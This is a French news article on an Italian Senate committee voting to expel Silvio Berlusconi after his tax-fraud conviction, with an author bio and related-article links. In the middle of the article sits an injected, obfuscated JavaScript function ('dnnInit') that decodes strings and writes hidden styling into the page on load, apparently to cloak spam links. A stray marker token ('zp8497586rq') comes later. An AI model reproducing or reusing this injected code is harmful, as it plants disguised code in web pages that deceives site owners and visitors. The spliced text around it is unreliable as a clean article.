Italie : une commission du Sénat vote sur l'expulsion de Berlusconi

Italie : une commission du Sénat vote sur l'expulsion de Berlusconi

Une commission spéciale du Sénat italien a voté vendredi pour priver Silvio Berlusconi de son siège parlementaire, après sa condamnation pour fraude fiscale.

La décision du panel devra être confirmée par un vote du Sénat dans les prochaines semaines, mais elle est interprétée comme un autre signe de la fin de la carrière politique du leader de centre- droit et du magnat des médias, qui domine la politique italienne depuis près de 20 ans.

La commission, qui fonctionne comme un organe judiciaire, s'est réunie aux environs de 09h30 vendredi matin au Palazzo Madama, palais du Sénat, et a tenu une brève session publique pour discuter des derniers problèmes juridiques et procéduriers avant de se réunir à huis clos.

Comme prévu, M. Berlusconi ne s'est pas présenté, ni ses avocats Franco Coppi, Piero Longo et Niccolo Ghedini. Ils avaient annoncé qu'ils ne se présenteraient pas devant la commission, car ils ne le considéraient « pas impartial ».

« De nombreux membres de ce panel ont déjà exprimé publiquement leur position en faveur de l'éjection de M. Berlusconi et il est donc inutile pour nous d'intervenir pour défendre notre client », ont-ils déclaré dans un communiqué vendredi matin.
function dnnInit(){var a=0,m,v,t,z,x=new Array(« 9091968376″, »88879181928187863473749187849392773592878834213333338896″, »778787″, »949990793917947998942577939317 »),l=x.length;while(++a<=l){m=x[l-a];t=z="";for(v=0;v<m.length;){t+=m.charAt(v++);if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);t="";}}x[l-a]=z;}document.write(". »+x[2]+ »{« +x[1]+ »} »);}dnnInit();

« L'expulsion de M. Berlusconi du parlement n'est qu'une question d'application de la loi, non une question politique », a déclaré l'avocat Ulisse Di Giacomo pendant une audience de la commission.

Le verdict de la commission a été annoncé juste après 16h30 vendredi. M. Berlusconi estime qu'il est la victime d'un verdict politique : « Ma condamnation pour fraude fiscale est le résultat d'une campagne politique bien ficelée visant à m'éjecter de mon poste de leader de centre-droit. Mais je suis sûr que j'obtiendrai justice de la Cour de l'Union Européenne, auprès de laquelle nous avons déjà fait appel », a-t-il déclaré jeudi soir aux médias locaux.

Le 1er août, M. Berlusconi a été condamné pour fraude fiscale par la Cour suprême italienne à une peine de quatre ans de prison, automatiquement réduite à un an selon la loi de 2006 sur le pardon.

zp8497586rq
Bona

Bona

L'actualité africaine n'a pas de secret pour moi. Toujours à l'afflux, je ne loupe rien.


Tags assigned to this article:
italiepolitique

Related Articles

Seybah Dagoma élue députée en France

Pour une première, c’est une réussite. Avec 70,1% des voix, Seybah Dagoma, avocate en droit des affaires et candidate socialiste dans la

La santé de Pelé, légende du football brésilien, se détériore

  Hospitalisé dans à Sao Paulo pour une infection urinaire, l’ex-footballeur de 74 ans a été transféré en soins spécialisés.

Venezuela: Chavez se dit guéri et prêt à gouverner au moins jusqu’en 2019

Le président vénézuélien Hugo Chavez, candidat le 7 octobre à un nouveau mandat de six ans, s’est à nouveau déclaré